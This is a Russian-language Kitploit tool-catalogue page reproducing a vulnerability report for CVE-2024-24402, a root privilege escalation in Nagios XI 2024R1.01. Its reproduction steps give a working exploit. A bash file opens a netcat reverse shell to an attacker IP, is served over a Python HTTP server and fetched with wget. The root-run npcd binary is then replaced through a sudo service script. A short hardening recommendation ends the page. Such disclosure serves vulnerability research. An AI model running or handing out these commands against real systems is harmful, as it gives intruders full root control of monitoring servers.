Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-24402 — Повышение привилегий в Nagios 2024R1.01 | Kitploit
Инструменты/GitHubGitHub/mawk0235/cve-2024-24402
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Повышение привилегий в Nagios 2024R1.01

Репозиторий
42 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отчёт об уязвимости

CVE обнаружено: Jarod Jaslow (MAWK)

Сведения об уязвимости:

  • Конечная точка: Nagios XI версии 2024R1.01
  • Тип уязвимости: Повышение привилегий от пользователя «NAGIOS»
  • Результат эксплуатации: Полный root-доступ к целевой системе

Шаги воспроизведения:

1. Создайте новый экземпляр Nagios XI версии 2024R1.01:

  • Загрузите файл OVA Nagios XI по ссылке: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • Разверните OVA, чтобы создать новый экземпляр. -Используя мой предыдущий отчёт, получите RCE на сервере

2. Используйте повышение привилегий:

  • От имени пользователя «NAGIOS» создайте на машине атакующего файл со следующим содержимым:

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • Разместите файл на машине атакующего с помощью Python HTTP-сервера:

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • Запустите прослушивающий сервер Netcat (NC) на машине атакующего:

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. Выполните эксплуатацию на компьютере жертвы:

  • Загрузите файл с машины атакующего:

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • Выполните следующие команды для повышения привилегий и получения соединения с правами root:

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

Рекомендация:

Рекомендуется ограничить возможность пользователя «NAGIOS» записывать в исполняемые файлы служб Nagios, которые запускаются с правами root. Этого можно достичь путём внедрения более строгих прав на файлы и механизмов контроля доступа для соответствующих каталогов и файлов, связанных со службами Nagios.

Это должно быть исправлено в новых выпусках.

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

Скачать инструмент